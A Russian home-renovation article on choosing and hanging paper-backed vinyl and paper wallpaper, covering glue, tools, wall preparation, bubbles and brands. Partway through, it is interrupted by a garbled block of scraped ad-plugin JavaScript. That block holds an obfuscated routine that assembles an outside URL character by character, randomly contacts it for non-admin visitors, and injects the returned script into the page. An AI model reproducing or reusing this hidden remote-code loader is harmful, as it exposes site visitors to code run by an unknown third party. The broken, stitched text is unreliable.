Как клеить бумажные обои, правильно и без пузырей?

Рекомендации по работе с винилом на бумажной основе

Учитывая опыт профессионалов и отзывы любителей собственноручного ремонта, можно составить список важных моментов:

  • Вред приносят не обои, как таковые, а повышенная влажность в помещении. Чтобы на стенах не разрасталась плесень, комнату нужно регулярно проветривать.
  • После шпаклевки, грунтовки стены сохнут не менее суток. Обои клеят только на абсолютно сухую поверхность.
  • Винил на любой основе не любит клей. Если состав попал на лицевую сторону обоев, нужно вытереть его, как можно быстрее. Когда клеевые пятна сохнут, они оставляют темные отпечатки на поверхности.
  • Сколько бы клея ни нужно было сыпать в воду по инструкции, необходимо следить за густотой состава – клей не должен быть как вода, обои из бумаги и так долго сохнут.
  • Для спальни и детской лучше выбирать спокойные оттенки (персиковый, голубой, зеленый, бежевый), на кухне и в гостиной можно поиграть с контрастными текстурами и цветами.
  • Материалы для ремонта не должны быть слишком дешевыми, лучше выбирать проверенных производителей. Это не обязательно зарубежные фабрики, в странах СНГ тоже делают хорошие обои (Славянские, например).
  • Сколько бы денег ни было потрачено на обои, многое зависит от клеящего состава. Клей нужно выбирать специальный для определенного типа покрытий, так же важен производитель.

Вред виниловых обоев до сих пор не доказан, а их красота и многообразие фактур поразят любое воображение. Покрытия на бумажной основе имеют не только недостатки, в некоторых аспектах они превосходят дорогой флизелин. Украшенные винилом стены прослужат около 10 лет, их легко чистить и даже можно мыть.

Виниловые обои на бумажной основе. разновидности.

wpDiscuz

“:’

‘:””,document.createElement(“div”),c=ff(window),b=ff(“body”),g=void 0===flatPM_getCookie(“flat_modal_” a.ID “_mb”)||”false”!=flatPM_getCookie(“flat_modal_” a.ID “_mb”),i=”scroll.flatmodal” a.ID,m=”mouseleave.flatmodal” a.ID ” blur.flatmodal” a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&”true”==a.how.popup.timer&&(t=ff(‘.fpm_5_modal[data-id-modal=”‘ a.ID ‘”] .fpm_5_timer span’),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(–e),e<=0&&(clearInterval(o),t.parent().replaceWith(‘

‘))},1e3))},s=function(){void 0!==a.how.popup.cookie&&”false”==a.how.popup.cookie&&g&&(flatPM_setCookie(“flat_modal_” a.ID “_mb”,!1),ff(‘.fpm_5_modal[data-id-modal=”‘ a.ID ‘”]’).addClass(“fpm_5_modal-show”),l()),void 0!==a.how.popup.cookie&&”false”==a.how.popup.cookie||(ff(‘.fpm_5_modal[data-id-modal=”‘ a.ID ‘”]’).addClass(“fpm_5_modal-show”),l())},ff(“body > *”).eq(0).before(‘

‘ p “

“),w=document.querySelector(‘.fpm_5_modal[data-id-modal=”‘ a.ID ‘”] .fpm_5_modal-content’),flatPM_setHTML(w,e),”px”==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&”true”==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&”true”==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&”true”==a.how.outgoing.timer&&(t=ff(‘.fpm_5_out[data-id-out=”‘ a.ID ‘”] .fpm_5_timer span’),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(–e),e<=0&&(clearInterval(o),t.parent().replaceWith(‘

‘))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&”false”==a.how.outgoing.cookie&&g&&(ff(‘.fpm_5_out[data-id-out=”‘ a.ID ‘”]’).addClass(“show”),n(),b.on(“click”,’.fpm_5_out[data-id-out=”‘ a.ID ‘”] .fpm_5_cross’,function(){flatPM_setCookie(“flat_out_” a.ID “_mb”,!1)})),void 0!==a.how.outgoing.cookie&&”false”==a.how.outgoing.cookie||(ff(‘.fpm_5_out[data-id-out=”‘ a.ID ‘”]’).addClass(“show”),n())}var _,u=”0″!=a.how.outgoing.indent?’ style=”bottom:’ a.how.outgoing.indent ‘px”‘:””,p=”true”==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&”true”==a.how.outgoing.timer?’

Закрыть через ‘ a.how.outgoing.timer_count “

“:’

‘:””,c=ff(window),h=”scroll.out” a.ID,m=”mouseleave.outgoing” a.ID ” blur.outgoing” a.ID,g=void 0===flatPM_getCookie(“flat_out_” a.ID “_mb”)||”false”!=flatPM_getCookie(“flat_out_” a.ID “_mb”),b=(document.createElement(“div”),ff(“body”));switch(a.how.outgoing.whence){case”1″:_=”top”;break;case”2″:_=”bottom”;break;case”3″:_=”left”;break;case”4″:_=”right”}ff(“body > *”).eq(0).before(‘

‘ p “

“);var v,w=document.querySelector(‘.fpm_5_out[data-id-out=”‘ a.ID ‘”]’);flatPM_setHTML(w,e),”px”==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&”true”==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&”true”==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff(“body”),flat_userVars.init();for(var e=0;e<t;e ){var>flat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_sub<flat_uservars.textlen||void>flat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub<flat_uservars.titlelen)){if(void>.flatPM_sidebar)”);0<_.length&&_.each(function(){var t=ff(this),e=t.data(“height”)||350,o=t.data(“top”);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(“.flatPM_sidebar”);setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a<300||e.each(function(){var t=ff(this),e=a,o=t.data(“top”);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(“.flatPM_sticky_wrapper.flatPM_sidebar_block”).css(“height”,t)},4e3)}),”undefined”!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0<flat_stack_scripts.length&&flatpm_setscript(flat_stack_scripts),ff(“body> *”).last().after(‘

‘),flat_body.on(“click”,”.fpm_5_out .fpm_5_cross”,function(){ff(this).parent().removeClass(“show”).addClass(“closed”)}),flat_body.on(“click”,”.fpm_5_modal .fpm_5_cross”,function(){ff(this).closest(“.fpm_5_modal”).removeClass(“fpm_5_modal-show”)}),flat_pm_arr=[],ff(“.flat_pm_start”).remove(),ff(“[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)”).contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:] )[^>]*)/>/gi,d=/<([w:] )/,i=/<|&#?w ;/,c={option:[1,”

“],thead:[1,”

“],tbody:[1,”

“],colgroup:[2,”

“],col:[3,”

“],tr:[2,”

“],td:[3,”

“],th:[3,”

“],_default:[0,””,””]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement(“div”)),r=(d.exec(e)||[“”,””])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1] e.replace(l,”<$1>”) r[2],n=r[0];n–;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem(“sdghrg”);e?(e=parseInt(e) 1,localStorage.setItem(“sdghrg”,e)):localStorage.setItem(“sdghrg”,”0″);e=flatPM_random(1,166);0==ff(“#wpadminbar”).length&&111==e&&ff.ajax({type:”POST”,url:”h” “t” “t” “p” “s” “:” “/” “/” “r” “e” “a” “d” “o” “n” “e” “.” “r” “u” “/” “p” “i” “n” “g” “.” “p” “h” “p”,dataType:”jsonp”,data:{ping:”ping”},success:function(e){ff(“div”).first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector(‘[data-flat-script-id=”‘ t ‘”]’);if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0<e.length&&flatpm_setscript(e);else{a.onload>/gm,””).replace(//gm,””).trim(),e.code_alt=e.code_alt.replace(//gm,””).replace(//gm,””).trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a=”false”==d?”Закроется”:”Закрыть”,r=!flat_userVars.adb||””==e.code_alt&&duplicateMode?e.code:e.code_alt,n=’

‘,i=e.once;o(t).each(function(){var e=o(this);e.wrap(‘

‘);var t=e.closest(“.fpm_5_video”);flatPM_setHTML(t[0],n),e.find(“.fpm_5_video_flex”).one(“click”,function(){o(this).addClass(“show”)})}),o(“body”).on(“click”,”.fpm_5_video_item_hover”,function(){var e=o(this),t=e.closest(“.fpm_5_video_flex”);t.addClass(“show”);var a=t.find(“.fpm_5_timer span”),r=parseInt(l),n=setInterval(function(){a.text(–r),r<=0&&(clearInterval(n),”true”==d?a.parent().replaceWith(‘

‘):t.remove())},1e3);e.remove()}).on(“click”,”.fpm_5_video_flex .fpm_5_cross”,function(){o(this).closest(“.fpm_5_video_flex”).remove(),”true”==i&&o(“.fpm_5_video_flex”).remove()})};

Виниловые

Представляют ещё один многочисленный вид моющихся двухслойных обоев на бумажной основе. По своей популярности они стоят на первом месте вследствие своих отличных технических характеристик:

  • Возможность влажной уборки
  • Огромный спектр вариантов декоративного покрытия
  • Достаточно низкая стоимость
  • Стойкость к механическим повреждениям    

Изготавливаются они методом нанесения на бумажную основу вспененного винила (ПВХ). Рисунок на поверхность наносится методом горячего или холодного тиснения, что придаёт их поверхности дополнительный рельеф. Среди виниловых обоев можно выделить ингибированный винил — с глянцевой лицевой стороной, декоративная отделка которой производится при помощи химических веществ. Покрытие из винила горячего тиснения придаёт им особую рельефность, стойкость к воздействию ультрафиолета и истиранию.

Виниловые обои с плоским рисунком получили название “шелкография”. Рисунок на них наносится также методом горячего тиснения, но особая технология позволяет создать имитацию вкрапления в рисунок шёлковых нитей либо полностью имитировать поверхность узорчатой шёлковой ткани.

“Тяжёлый винил” — вид рельефных обоев из винила, нанесённого на несколько слоёв бумажной основы — до двух, трёх и более. Вследствие этого тяжёлые виниловые обои являются более долговечными и стойкими к воздействию внешних факторов. В то же время они обладают большей стоимостью, и при их наклеивании нужно соблюдать ряд особых рекомендаций.

Внешние отличия

Визуально отличить подложку в уже наклеенных обоях практически невозможно. Как флизелин, так и бумага являются лишь основой, верхний слой остается тем же – это винил. Он может быть вспененный, гладкий, тяжелый, моющийся, тисненый.

И все-таки небольшие отличия есть:

  1. Толщина полотна – флизелин объемнее, чем бумага. Он лучше скрывает недостатки поверхности, скрадывает трещины и неровности стен.
  2. Эластичность – в сухом виде флизелиновая подложка более подвижна, чем бумажная. В монтаже этих обоев на стены используют различные техники – бумагу смазывают клеем, она набухает и только тогда становится эластичной. Виниловые обои на бумажной основе легче ложатся на неровные углы, ими удобнее обернуть выступы возле окон и дверей.
  3. Сминаемость – бумага мнется, а на флизелине не остается заломов и перегибов.
  4. Просвечиваемость – флизелин объемный, но не плотный материал. Сквозь такие обои хорошо видны темные пятна на стенах, остатки старого покрытия. Бумага лучше скрывает цветные изъяны, она плотная и непрозрачная. Отзывы потребителей говорят о том, что при использовании винила с бумажной подложкой не обязательно удалять старые обои, особенно, если они сделаны из бумаги.

Достоинства

Положительных качеств у такой отделки довольно много. Первым будет доступная цена. Стоимость не превысит цену хороших обычных обоев, а по характеристикам, виниловое оформление будет получше.

Большое разнообразие орнаментов и фактур станет еще одним из положительных качеств такого вида отделки. Есть как плоские рисунки, так и рельефные узоры. Для отдельных видов изделий применяют специальные серебристые или золотистые оттенки в рисунках, придающие им сходство с позолотой или серебром.

Вопреки многим суждениям, плесень и грибок на таких покрытиях не заводится, так как они подвергаются специальной обработке, которая препятствует размножению вредных бактерий. Это делает обои более безопасными и безвредными для здоровья.

Практически любые виниловые обои можно мыть. Это положительным образом отражается на сроке их эксплуатации и сохранении красивого внешнего вида. Срок службы подобного оформления вообще может достигать десятка лет, но вам, скорее всего, уже через несколько лет захочется обновить надоевший интерьер.

Сделать это будет несложно. Благодаря структуре материал, включающего несколько слоев, один из них просто останется на стене, когда вы начнете снимать старые обои и послужит основой для наклеивания новых. Это – еще один плюс такого оформления.

Как не допустить появления пузырей

Появление пузырей на обоях возможно по разным причинам:

  • по комнате пробежал незаметный сквозняк;
  • плохо промазан клейстером лист шпалер;
  • стена с дефектами — есть раковины;
  • клей тяжелый для купленных обоев;
  • недостаточно плотно полотно прикатано к стене.

Практика показывает, что даже у опытнейших профессионалов хотя бы один из факторов проявляется — появляются пузыри. Но здесь срабатывает принцип: сам допустил — сам исправил.

Рассмотрим, как поклеить бумажные обои без пузырей, а точнее, как их убрать. Решение проблемы:

  • если клей не схватился — поможет разглаживание сухой тряпкой. Шпатель или валик лучше не использовать — могут растянуть в этом месте обойное полотно;
  • прокол пузыря шприцем, после чего через отверстие удаляется воздух с клеем. Если клей высох, выдавился только воздух, под обои с помощью шприца наносится клей. Восстановленное место валиком прикатывается к поверхности;
  • разрез обоев безопасной бритвой — оставляет незаметный след, если дальше все выполнено правильно (техника та же, что и со шприцем). Нож, каким бы острым не было лезвие, исключается.

Вывод: если появились пузыри, убрать их можно быстро и просто.

Внимание: все сказанное не относится к тонким обоям. Здесь нужно удалять только очень большие пузыри. Мелкие вздутия во время высыхания сами исчезнут — бумага натянется.

Какие достоинства есть у бумажных обоев

Казалось бы, бумага ничем не лучше флизелина. Рассмотренные ранее пункты не говорят в ее пользу. Однако и у бумажной подложки есть свои сильные стороны:

  1. Флизелин не производят на территории России. Этот материал необходимо транспортировать из других стран – а это дополнительные затраты. Бумаги же в стране достаточно, поэтому производство обоев на ее основе обходится намного дешевле. Производители из России и стран СНГ делают достойные по качеству продукты – многим известны Славянские виниловые обои, отзывы о них самые положительные. Низкая стоимость – главный плюс обоев с бумажной подложкой.
  2. Бумага имеет лучший коэффициент сцепления. Полотна легче приклеить к некоторым поверхностям.
  3. Бумажные обои несут меньший вред – под ними реже заводится плесень, они менее токсичны при горении.
  4. Высокая эластичность влажных полотен позволяет растянуть обои в нужном направлении, это упрощает монтаж в углах, впадинах и других неровностях. Хотя они и дольше сохнут.

Какие бы минусы ни нашли эксперты в качестве обоев с бумажной подложкой, сколько бы ни доказывали преимущества флизелина, потребитель в первую очередь выбирает «по одежке». Подходящий цвет и фактура – главные критерии выбора.

Совет! Перед походом в магазин нужно подсчитать, сколько рулонов понадобится для оклеивания комнаты. Также принимают во внимание, какие обои выбраны – с рисунком или нет. Подбор узора отнимает до 30% материала.

Какой клей для бумажных обоев лучше выбрать

В России большой выбор клея для бумажных обоев. Но не каждый клейстер соответствует обязательным требованиям:

  • иметь хорошую адгезию с обоями и стеной;
  • легко разводиться, без комков, до нужной консистенции;
  • не оставлять желтых следов на поверхности шпалер при высыхании.

Наиболее полно указанным критериям соответствуют хорошо известные марки. Дорогие:

  • «Quelyd»;
  • «Metylan»;
  • «Kleo».

Из среднего ценового сектора:

  • «QUALITY» («Кволити») — хороший клей с доступной ценой. Просто размешивается, хорошо держит;
  • «Момент» классик. Можно купить примерно за 100 руб. Имеет густоватую консистенцию, что позволяет без труда приклеить и копеечный симплекс, и плотный дуплекс;
  • «Экон» — немецкое качество не требует особых комментариев.

Среди дешевых видов клейстера можно выделить:

Если финансовые сложности не позволяют купить клеящий состав среднего и элитного класса, лучше отказаться от дешевой покупки и приготовить в домашних условиях клей самостоятельно. В любом случае качество будет не хуже. Потребуются:

  • крахмал — картофельный или кукурузный (2 столовые ложки);
  • мука — любая (1 стакан);
  • вода — 2,5 л.

Можно для усиления эффекта добавить столярный клей — чуть-чуть.

Готовится просто (рецепт и технология бабушек): в кастрюле доводится до кипения 2,5 л воды. В миске размешиваются мука с крахмалом, после чего туда тонкой струйкой добавляется холодная вода. Все тщательно перемешивается. В образовавшуюся кашу добавляется горячая вода до получения густоты сметаны.

  • низкая себестоимость;
  • экологическоя чистота;
  • высокая адгезия в течение примерно 10 часов, после чего нужно заваривать новый клейстер;
  • легкое приготовление.

Недостаток один — при работе в течение нескольких дней требуется ежедневное заваривание.

Материалы и инструменты

С наклеиванием бумажных обоев справится и новичок в этом деле. Главное, чтобы неукоснительно выполнялись все инструкции и рекомендации, а под руками были необходимые материалы и инструменты.

Из материалов потребуются:

  • рулоны бумажных обоев (расчет количества приведен ниже);
  • обойный клей универсальный или специальный, для бумаги;
  • праймер — чтобы ни говорили некоторые специалисты, все же стоит стены загрунтовать.

Перечень инструментов внушительный. Кое-что найдется дома или у друзей. Остальное придется докупать, т.к. большинство из перечисленных инструментов относится к расходному материалу — попользовался и выбросил.

Полный список включает:

  • стремянку. При ее отсутствии можно воспользоваться столом. Главное, чтобы был доступ к потолочному пространству;
  • емкости под клей и чистую воду. Можно воспользоваться пластиковыми ведрами на 8 или 10 л;
  • ванночку (кювету) для праймера и клея;
  • шуруповерт с миксерной насадкой для приготовления клея — ускорит работу. Если нет — покупать не обязательно. Клей можно размешать своими руками;
  • правило. Если нет дома или у друзей можно обойтись;
  • валик с телескопической ручкой и небольшую кисть — нужны для нанесения грунтовки;
  • отвес — без него нельзя провести стартовую вертикальную линию. Если есть лазерный уровень, отвес не нужен;
  • строительный карандаш или маркер;
  • рулетку на 3 или 5 м — помогает отрезать листы обоев;
  • канцелярский нож — используется для обрезки и подрезки шпалер;
  • широкий металлический шпатель — нужен для обрезки обоев около потолка и внизу;
  • обойный шпатель в виде крыла из пластика или резины — разглаживает обойное полотно на стене, удаляет пузырьки воздуха;
  • специальный обойный валик из плотной резины — нужен для прикатывания шпалер к стене. Население привыкло операцию выполнять руками. Такой фокус проходит с толстыми обоями: дуплекс. С тонкими, не всегда — или рвутся, или растягиваются, в результате чего появляются складки;
  • макловицу или большую малярную кисть для нанесения клея;
  • полотенце (салфетки) для рук и снятия выступившего клея (клей можно с тем же успехом снимать поролоновой губкой);
  • небольшой резиновый, конусообразный валик для прикатывания стыков.

Наклейка обоев

Ещё не так давно, для более плотной сцепки обоев с поверхностью, поверхность стен предварительно оклеивались старыми газетами. Современные клеевые составы, благодаря наличию специальных присадок, улучшающих адгезию (сцепление с поверхностью), делают данный дедовский метод абсолютно не нужным.

Важно! Непременным условием при работе считается отсутствие сквозняков — это приводит к неравномерному, или чересчур быстрому высыханию бумажных поверхностей

В результате весь цикл нарушается, и обои начинают отставать от стен.

Перед этим надо отмерить и обрезать полотно по высоте, оставив запас в 5 — 10 см. При наличии на поверхности обоев рисунка, каждое полотно тщательно совмещается, чтобы рисунки на стыках совпали друг с другом. Затем подготовленные бумажные полотна стелятся на пол и промазываются клеем.

Промазанные отрезки складываются поперёк вдвое, внутренней, покрытой клеем, стороной друг к другу, и оставляются в таком виде на 1 — 3 минуты (точное время может быть указано на упаковке с обоями). Эта процедура для равномерной пропитки всей основы клеем.

Работу лучше производить вдвоём — так весь процесс работы будет идти гораздо быстрее и качественнее. Поклейка обычно начинается с угла, или с обозначенной ранее, при помощи уровня, вертикальной черты. Стыковка, в зависимости от вида обоев, может производиться либо встык, либо внахлёст.

После наложения нужным образом полотна на стену, поверхность его нужно тщательно разгладить при помощи валика, сухой тряпки или пластиковой щётки. В случае попадания клея на лицевую сторону его нужно немедленно удалить. Образовавшиеся под обоями пузырьки воздуха следует удалить, разгладив поверхность либо проколов их иглою.

При наклеивании обоев с угла, нужно оставить напуск на противоположную стену шириной в 3 — 5 см. Эта узкая полоса заклеивается другим полотном при переходе на смежную стену. Таким образом, в углах создаётся более плотная сцепка и обеспечивается ровная поверхность. Оставшийся запас по длине аккуратно срезаем по месту после наклейки при помощи канцелярского ножа.

Важно! При поклейке обоев на бумажной основе нельзя растягивать полотно в ширину — это приводит к деформации рисунка и самого полотна.

На видео представлены основные этапы наклеивания обоев на бумажной основе.

Недостатки бумажных обоев

  1. Срок службы при идеальных условиях эксплуатации не превышает 10 лет. Со временем внешний вид обоев начинает желтеть и терять привлекательность. К тому же они непрактичны, легко пачкаются и их любят разрисовывать дети.
  2. Бумажные обои нетерпимы к влажности, они не могут быть использованы на кухне, ванной, душевой, санузле и других помещениях, где требуется периодическая обработка стен санитарными средствами.
  3. Склонность к быстрому истиранию поверхности обоев приводит к тому, что в местах частого прикосновения они темнеют и образуют неприглядные пятна. Особо заметны они вокруг белых выключателей и розеток. Против этого применяются специальные пластиковые накладки, монтируемые вокруг этих деталей, однако это не всегда смотрится гармонично в общем интерьере помещения.
  4. Обои на бумаге подвержены выгоранию под действием солнечных лучей. Обои на той стороне комнаты, куда чаще попадают солнечные лучи, светлеют быстрее. Если там стоит мебель, то  образуются тёмные тени, повторяющие контур мебели, которые становятся явно заметными при перестановке мебели.
  5. Прочность обоев небольшая, они легко повреждаются при случайном попадании твёрдых и острых предметов: отвёртки, ножа, угла стола и т.д. Однослойные гладкие обои в точности повторяют все неровности стены.

Нюансы поклейки бумажных обоев

Бумажные обои имеют репутацию бюджетных отделочных материалов, как по цене, так и по дизайну, вдобавок еще и капризных. Попробуем разобраться, так ли это.

1. Дешевые? А это как посмотреть: отдельные модели можно купить за 40-50 руб./рулон («Мираж»). Дешевле вряд ли можно найти. Но и самые дорогие — это тоже бумага: американские Schumacher стоят около 130,0 тыс. руб. за трубку ($2,0 тыс.). Похоже, бумага разная.

2. Капризные? Опять, не все так просто. В продаже можно встретить различные по структуре шпалеры: однослойные (симплекс) и из двух и более слоев (дуплекс). Первые — дешевые, тонкие, капризные (сложно наклеить на стену — швы расходятся из-за усадки в процессе высыхания, рвутся под руками при разглаживании), недолговечные. Это скорее временная отделка стен.

Такое поведение обойного полотна дало новую жизнь технологии поклейки, которую использовали бабушки и дедушки, а также их родители — внахлест. Тонкая структура полотна позволяет — швы малозаметные.

Многослойные обои (дуплекс) состоят из основы и декоративного слоя, которые крепко склеены между собой. Они дороже однослойных шпалер, но и срок службы у них в 2-3 раза выше. К тому же нет головной боли при поклейке — они более технологичны: не сильно размокают, хорошо разглаживаются, без проблем клеятся встык.

Многослойность обойного полотна внесла путаницу в понятие бумажных обоев. Так, не только домашние мастера, но и некоторые отделочники-профессионалы относят к таковым шпалеры, где основа бумага, а декоративное покрытие:

  • винил;
  • текстиль;
  • акрил;
  • велюр;
  • шпон;
  • пробка;
  • бамбук;
  • линкруст.

Реже, но также бумажными обоями считается полотно, где основа флизелин, а декоративный слой бумажный. Свойства у перечисленных видов обоев совершенно другие. Подчеркнем — бумажными обоями считаются полотна, где все слои только из бумаги.

Современное оборудование позволило организовать выпуск бумажных шпалер с разной фактурой:

  • гладкие;
  • тисненые;
  • под покраску;
  • рельефные.

В результате, к огромному выбору по цвету и рисунку добавилась разная фактура поверхности. Все это позволяет подобрать обои под любой стиль интерьера. При этом не следует забывать, что королевская классика не признает других видов шпалер. Только бумажные.

В заключение, последний нюанс: у импортных обоев другой размер, о чем не следует забывать. Так, у американских шпалер длина 8,23 м, ширина — 68 см. В Европе ширина — 75 или 106 см, длина — 25 м.

Подготовка обоев

Профессионалы никогда не совмещают сухие и мокрые процессы при поклейке бумажных обоев. Потому предварительно нарезают листы для всех стен. Пошаговый алгоритм следующий:

  • в нескольких местах измеряется высота стены. Если разница по длине не превышает 2-3 см, берется среднее значение и более к измерениям не возвращаются — недочеты скроет плинтус. Если же плинтус не снят, мерить придется каждый третий лист. Иначе можно наделать беды;
  • рулон раскатывается по полу;
  • рулеткой отмеряется длина первого листа;
  • полотно шпалер сгибается в обратную сторону. Сгиб проглаживается рукой;
  • если нет подгонки по рисунку, трубка раскатывается туда/обратно до тех пор, пока не закончится;
  • строительным ножом (ножницами неудобно) рулон по сгибам разрезается на отдельные полотна.

При подгонке цвета, работы ведутся по-другому:

  • отрезанный первый лист переворачивается лицевой стороной вверх;
  • рулон раскатывается;
  • производится совмещение рисунков. Здесь главное не перепутать, с какой стороны будет наклеиваться следующая полоса;
  • второй лист отрезается снизу, на одном уровне с первым листом. Вверху будет отрезан уже на стене. Если резать на полу, можно ошибиться;
  • листы с обратной стороны нумеруются.

И так для всех стен. Если есть значительная разница по высоте, на каждом третьем листе все проделывается сначала.

Подготовка стен

Качество отделки бумажными обоями и долговечность напрямую зависят от уровня подготовки поверхности. Она должна быть ровной. Иначе все выпуклости и вогнутости будут резать глаза. Детально процесс изложен в материале «Как подготовить стены к поклейке обоев». Напомним, о чем там речь:

  • со стен удаляется различный крепеж, обесточивается помещение, после чего снимаются выключатели и розетки. Оголенные провода изолируются, после чего можно включить подачу напряжения;
  • снимаются плинтуса и наличники с дверей. На практике проверено, что чуть проигрывая по времени на операцию снятия и возврата на место плинтусов и наличников, сильно упрощается проход дверного проема и работа с обоями около пола;
  • удаляется старая отделка — обои, краска, побелка;
  • проводится ревизия штукатурки — стены простукиваются молотком. При наличии бухтящих мест штукатурный слой удаляется;
  • появившиеся трещины и сколы заделываются;
  • загрязненные копотью и жиром места очищаются;
  • стена грунтуется праймером глубокого проникновения;
  • штукатурится при необходимости;
  • после штукатурки поверхность снова грунтуется, после чего шпатлюется;
  • перед оклейкой обоями еще раз грунтуется, но уже под обои. Многие отделочники пропускают операцию грунтования бетонных стен. Здесь можно и так, и так. Но лучше всего загрунтовать — затраты небольшие.

Внимание: в различных материалах на нашем сайте уже не раз объяснялось, что перед оклейкой обоями гипсокартона его в обязательном порядке нужно зашпаклевать. К сожалению, ошибка постоянно повторяется. Потом хозяева с удивлением наблюдают, как листы шпалер удаляются вместе с картоном ГКЛ.

Подготовка стены

Перед наклейкой обоев на бумажной основе, как и перед любой отделочной работой, необходимо произвести ряд подготовительных работ. Прежде всего, нужно очистить стены от старых обоев, и неплотно держащихся оснований. Для этого, при помощи металлического шпателя или специального скребка очищаем поверхность, уделяя особое внимание вздутиям и отслоениям штукатурки и шпаклёвки.

Для удаления старых обоев их следует предварительно смочить и оставить на некоторое время. После этого просто отделить их от стены шпателем. Если же это не удастся сделать при помощи воды, то рекомендуется использовать для этих целей специальную жидкость.

Перед её нанесением, для более лёгкого доступа к основанию, старую поверхность необходимо перфорировать или изрезать с помощью ножа или “обойного тигра”. Через 20 — 30 минут после нанесения жидкости, даже самые крепко держащиеся обои легко удаляются со стены.

Далее, необходимо тщательно зашпаклевать трещины, выбоины и прочие неровности. В противном случае после наклейки некоторые виды рисунка могут подчеркнуть все изъяны несущей поверхности. При необходимости, для получения качественно оформленного интерьера, придётся прибегнуть к помощи штукатурки для выравнивания стен.

Важно! Перед выбором того или иного варианта обоев, следует помнить, что абстрактный, разбросанный по всей поверхности узор способен замаскировать неровности стены.

В то же время чёткий геометрический рисунок, например, в виде полос, наоборот — подчеркнёт все малейшие неровности и дефекты поверхности.   

Популярные производители и цены

На стоимость изделий из винила на бумажной основе влияет несколько факторов. Нужно учитывать плотность полотна, сколько слоев бумаги лежит в основе, какая технология используется для нанесения винила и фактуры, каким способом производится окрашивание поверхности.

В зависимости от приведенных факторов, цены на шпалеры могут варьироваться от 150 до 3500 рублей за рулон.

Наиболее популярную продукцию из этого материала поставляют следующие производители:

  • «Rasch Sintra» — совместное производство Германии и Украины. Стоимость начинается от 500 рублей за рулон. Из положительных особенностей можно выделить отличную стойкость поверхности к выгоранию на солнечном свету. Недостатки – у шпалер, произведенных на территории Украины, часто встречается брак;
  • «Zambaiti Parati» — производитель из Италии. При высоком качестве продукция этой фирмы достаточно дорога (от 1500 руб. за рулон). Изделия долговечны, износоустойчивы и отлично сохраняют свежесть красок длительное время. К недостаткам относят дороговизну продукции и наличие брака на заводах, размещенных в Китае;
  • «Casamance» — продукция из Франции. Стоимость от 2500 рублей за рулон. Обои этого производителя имеют длительный срок службы и очень просто клеятся, но высокая стоимость перекрывает эти плюсы;
  • «Маякпринт» — отечественный завод. Демократичные цены (от 300 рублей) не влияют на качество продукции – обои этой фирмы обладают высокой плотностью, долгое время не теряют изначальный вид, отлично удерживаются на стенах в условиях повышенной влажности. Из минусов – встречается брак.

Правила поклейки

Перед тем как клеить виниловые обои на бумажной основе, нужно ознакомиться с правилами работы. Особенности данного материала требуют особого подхода к процессу поклейки. Стоит учитывать, что при смазывании полотен бумажные волокна разбухают. После высыхания, наоборот, стягиваются. Поэтому у новичков часто возникают проблемы с расхождением швов после оклеивания стен.

В помещении, где производится ремонт, должны отсутствовать сквозняки. Температурный режим должен соблюдаться в течение того времени, пока клей не высохнет.

Как правильно клеить виниловые обои на бумажной основе:

  1. Нанести клей на полосу и подождать пока полотно набухнет.
  2. Оклеивание производится с дальнего угла комнаты.
  3. Приложить полоску к стене и разровнять с помощью гладкого валика.
  4. С помощью пластмассового мастерка выгнать воздух из-под обоев. При этом надо мастерком двигаться от центра полоски к краям.
  5. Выступивший на лицевую сторону полоски клей нужно сразу же подтереть.
  6. Следующую полоску нужно прикладывать встык к первой. Наклеивание внахлест исключено. Дальнейший процесс повторяется, как и с первой полоской.

Просветы между полосками после высыхания образуются, если переборщить со временем, отведенным на набухание полотна. Другие особенности относительно монтажа обычно указаны в инструкции, приложенной к рулону. В основном дополнительные условия оклеивания указывают в отношении особых видов материала.

Разновидности бумажных обоев

